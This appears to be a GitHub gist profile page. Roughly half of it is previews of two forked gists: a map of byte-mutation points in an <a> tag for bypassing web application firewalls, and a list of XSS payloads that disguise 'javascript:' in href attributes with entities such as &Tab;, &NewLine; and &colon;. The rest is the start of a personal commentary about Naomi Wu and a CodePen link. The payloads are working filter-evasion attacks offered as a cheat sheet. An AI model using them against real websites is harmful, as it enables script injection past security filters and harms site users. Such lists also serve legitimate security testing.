Skip to content

Instantly share code, notes, and snippets.

View aburone's full-sized avatar

Ariel Burone aburone

View GitHub Profile
@aburone
aburone / mutation_a.txt
Created July 22, 2020 14:57 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
@aburone
aburone / href_bypass.html
Created July 22, 2020 14:57 — forked from hackerscrolls/href_bypass.html
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
About Naomi Wu / RealSexyCyborg / Machine Enchantress
Sit comfy because this is LONG.
Thing to consider before starting:
0.- I’m horrible with names and English is not my mother tongue. I’ll put links at the end.
1.- Naomi lives in China, under a repressive regime that don’t hesitate to “send away” people deemed as “too problematic”.
2.- You can’t possibly understand how complicated is the situation. You’re not there.
3.- She can’t give specifics; her life is actually in danger. This is not an exaggeration.
4.- She’s been advocating for women’s rights for years. Right to work, to an equal education, etc.
5.- She’s done some impressive work in the Chinese industry, pushing for open source hardware and improving business practices. Probably that’s the only reason why she’s still alive.
@aburone
aburone / Pulsating-menu-on-hover.markdown
Created February 21, 2014 07:00
A Pen by Ariel Burone.